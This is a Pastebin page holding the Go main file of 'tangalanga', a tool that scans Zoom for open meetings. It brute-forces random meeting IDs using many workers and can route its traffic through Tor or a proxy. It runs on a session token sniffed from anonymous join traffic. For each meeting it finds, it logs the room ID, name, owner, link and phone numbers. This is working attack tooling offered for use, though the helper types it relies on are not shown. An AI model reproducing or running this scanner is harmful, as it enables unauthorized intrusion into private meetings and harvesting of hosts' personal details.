Advertisement
FlyFar

main.go

Dec 28th, 2023
989
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Go 6.59 KB | Cybersecurity | 0 0
  1. package main
  2.  
  3. import (
  4.     "flag"
  5.     "fmt"
  6.     "math/rand"
  7.     "net/http"
  8.     "os"
  9.     "os/signal"
  10.     "runtime"
  11.     "strconv"
  12.     "strings"
  13.     "sync"
  14.     "syscall"
  15.     "time"
  16.  
  17.     "github.com/logrusorgru/aurora"
  18.     log "github.com/sirupsen/logrus"
  19. )
  20.  
  21. const logo = `
  22.  
  23.         zoom scanner
  24.  
  25. ▄▄▄▄▄ ▄▄▄·  ▐ ▄  ▄▄ •  ▄▄▄· ▄▄▌   ▄▄▄·  ▐ ▄  ▄▄ •  ▄▄▄·
  26. •██  ▐█ ▀█ •█▌▐█▐█ ▀ ▪▐█ ▀█ ██•  ▐█ ▀█ •█▌▐█▐█ ▀ ▪▐█ ▀█
  27.  ▐█.▪▄█▀▀█ ▐█▐▐▌▄█ ▀█▄▄█▀▀█ ██▪  ▄█▀▀█ ▐█▐▐▌▄█ ▀█▄▄█▀▀█
  28.  ▐█▌·▐█ ▪▐▌██▐█▌▐█▄▪▐█▐█ ▪▐▌▐█▌▐▌▐█ ▪▐▌██▐█▌▐█▄▪▐█▐█ ▪▐▌
  29.  ▀▀▀  ▀  ▀ ▀▀ █▪·▀▀▀▀  ▀  ▀ .▀▀▀  ▀  ▀ ▀▀ █▪·▀▀▀▀  ▀  ▀
  30.  
  31.         made with 💀 by @cuerbot
  32.  
  33. `
  34.  
  35. const zoomUrl = "https://www3.zoom.us/conf/j"
  36.  
  37. // added at compile time
  38. var version string
  39. var baked string
  40.  
  41. var color aurora.Aurora
  42. var tangalanga *Tangalanga
  43. var wg sync.WaitGroup
  44. var ids chan int
  45. var start time.Time
  46.  
  47. var token = flag.String("token", availableToken(), "zpk token to use")
  48. var colorFlag = flag.Bool("colors", true, "enable or disable colors")
  49. var censorFlag = flag.Bool("censor", false, "enable or disable stdout censorship")
  50. var outputFile = flag.String("output", "", "output file for successful finds")
  51. var debugFlag = flag.Bool("debug", false, "show error messages")
  52. var torFlag = flag.Bool("tor", false, "connect via tor")
  53. var proxyAddr = flag.String("proxy", "socks5://127.0.0.1:9150", "socks url to use as proxy")
  54. var hiddenFlag = flag.Bool("hidden", false, "connect via embedded tor")
  55. var rateCount = flag.Int("rate", runtime.NumCPU(), "worker count. defaults to CPU count")
  56.  
  57. func init() {
  58.     var t *http.Transport
  59.  
  60.     rand.Seed(time.Now().UnixNano())
  61.  
  62.     color = aurora.NewAurora(*colorFlag)
  63.     ids = make(chan int)
  64.     start = time.Now()
  65.  
  66.     fmt.Println(color.Green(logo))
  67.  
  68.     flag.Parse()
  69.  
  70.     if *token == "" {
  71.         fmt.Printf("%s is required.\n", color.Red("-token="))
  72.         fmt.Println()
  73.  
  74.         fmt.Printf("%s can also be defined in the ENV.\n", color.Red("TOKEN"))
  75.         fmt.Println()
  76.  
  77.         info := "token can be found by sniffing the traffic trying to join any meeting\n" +
  78.             "currently i can't find how the token is generated but any lives for ~24 hours.\n" +
  79.             "the token can be found as part of the Cookie header.\n" +
  80.             "there's no need for authentication, anonymous join attempt will generate the cookie."
  81.  
  82.         fmt.Printf("%s %s\n", color.Red("zpk"), color.Yellow(info))
  83.         fmt.Println()
  84.  
  85.         os.Exit(1)
  86.     }
  87.  
  88.     fmt.Printf("build is %s\n", color.Yellow(version))
  89.  
  90.     if *outputFile != "" {
  91.         file, err := os.OpenFile(*outputFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
  92.  
  93.         if err != nil {
  94.             log.SetOutput(os.Stdout)
  95.         } else {
  96.             fmt.Printf("output is %s\n", color.Yellow(*outputFile))
  97.             log.SetOutput(file)
  98.         }
  99.     }
  100.  
  101.     fmt.Printf("worker pool size %d\n", color.Yellow(*rateCount))
  102.  
  103.     transports := new(Transport)
  104.  
  105.     switch true {
  106.     case *hiddenFlag:
  107.         fmt.Printf("connecting to the TOR network... %s\n", color.Yellow("please wait"))
  108.         t = transports.InteralTOR()
  109.  
  110.     case *torFlag:
  111.         fmt.Printf("connecting to the TOR network via proxy %s...\n", color.Yellow(*proxyAddr))
  112.         t = transports.Proxy(*proxyAddr)
  113.  
  114.     default:
  115.         t = transports.Default()
  116.     }
  117.  
  118.     tangalanga, _ = NewTangalanga(
  119.         WithTransport(t),
  120.     )
  121.  
  122. }
  123.  
  124. func availableToken() string {
  125.     switch {
  126.     case os.Getenv("TOKEN") != "":
  127.         return os.Getenv("TOKEN")
  128.     case baked != "":
  129.         return baked
  130.     default:
  131.         return ""
  132.     }
  133. }
  134.  
  135. func randId() int {
  136.     min := 50000000000 // Just to avoid a sea of non existent ids
  137.     max := 99999999999
  138.  
  139.     return rand.Intn(max-min+1) + min
  140. }
  141.  
  142. func hide(msg string) string {
  143.     return censor(msg, 3)
  144. }
  145.  
  146. func censor(msg string, n int) string {
  147.     text := []rune(msg)
  148.     x := strings.Repeat("#", len(msg)-n)
  149.  
  150.     return string(text[0:n]) + x
  151. }
  152.  
  153. func find(id int) {
  154.     m, err := tangalanga.FindMeeting(id)
  155.  
  156.     if err != nil && *debugFlag {
  157.         fmt.Printf("%s\n", err)
  158.     }
  159.  
  160.     if err == nil {
  161.         r := m.GetRoom()
  162.  
  163.         roomId := strconv.FormatUint(r.GetRoomId(), 10)
  164.         roomName := r.GetRoomName()
  165.         user := r.GetUser()
  166.         link := r.GetLink()
  167.  
  168.         msg := "\nRoom ID: %s.\n" +
  169.             "Room: %s.\n" +
  170.             "Owner: %s.\n" +
  171.             "Link: %s\n\n"
  172.  
  173.         if !*censorFlag || *outputFile != "" {
  174.             log.WithFields(log.Fields{
  175.                 "room_id":   roomId,
  176.                 "room_name": roomName,
  177.                 "owner":     user,
  178.                 "link":      link,
  179.             }).Info(r.GetPhoneNumbers())
  180.         }
  181.  
  182.         if *censorFlag {
  183.             roomId = hide(roomId)
  184.             roomName = hide(roomName)
  185.             user = hide(user)
  186.             link = censor(link, 10)
  187.         }
  188.  
  189.         fmt.Printf(msg,
  190.             color.Green(roomId),
  191.             color.Green(roomName),
  192.             color.Green(user),
  193.             color.Yellow(link),
  194.         )
  195.     }
  196.  
  197. }
  198.  
  199. func pool() {
  200.     for i := 0; i < *rateCount; i++ {
  201.         go func() {
  202.             for id := range ids {
  203.                 find(id)
  204.                 wg.Done()
  205.             }
  206.         }()
  207.     }
  208. }
  209.  
  210. func main() {
  211.     c := make(chan os.Signal, 1)
  212.     done := 0
  213.  
  214.     signal.Notify(c, syscall.SIGINT, syscall.SIGTERM)
  215.  
  216.     fmt.Printf("searching for open meetings... %s\n", color.Yellow("please wait"))
  217.     fmt.Println()
  218.  
  219.     go func() {
  220.         <-c
  221.         tangalanga.Close()
  222.  
  223.         fmt.Println()
  224.         fmt.Printf("run for %s\n", color.Blue(time.Since(start)))
  225.         fmt.Printf("attempted %d times \n", color.Yellow(done))
  226.         fmt.Printf("found %d meetings. \n", color.Green(tangalanga.Found))
  227.         fmt.Println()
  228.         fmt.Printf("💣 with care. thank you for using %s!\n", color.Green("tangalanga"))
  229.         fmt.Println()
  230.         os.Exit(0)
  231.     }()
  232.  
  233.     go pool()
  234.  
  235.     for h := 0; ; h++ {
  236.         for i := 0; i < *rateCount; i++ {
  237.             wg.Add(1)
  238.             ids <- randId()
  239.             done++
  240.  
  241.             if done%200 == 0 && h > 0 && *debugFlag == false {
  242.                 // Just to show something if no debug
  243.                 m := "found %d open meetings after %d attempts. the search continues\n"
  244.                 fmt.Printf(m, color.Green(tangalanga.Found), color.Yellow(done))
  245.             }
  246.         }
  247.  
  248.         if tangalanga.ExpiredToken {
  249.             m := "the %s expired, you need to sniff join traffic for a new one\n"
  250.             fmt.Printf(m, color.Red("token"))
  251.  
  252.             m = "you need to pass %s with the new token\n"
  253.             fmt.Printf(m, color.Red("-token="))
  254.             c <- syscall.SIGINT
  255.         }
  256.  
  257.         // If there are too many suspicious "not found" try restarting the ...
  258.         if tangalanga.Suspicious > 1000 {
  259.             fmt.Println(color.Yellow("more than 1000 suspicious results. changing random"))
  260.             rand.Seed(time.Now().UnixNano())
  261.             tangalanga.Suspicious = 0
  262.         }
  263.  
  264.         if *debugFlag {
  265.             fmt.Println(color.Yellow("waiting for queue to drain..."))
  266.         }
  267.  
  268.         wg.Wait()
  269.  
  270.     }
  271. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement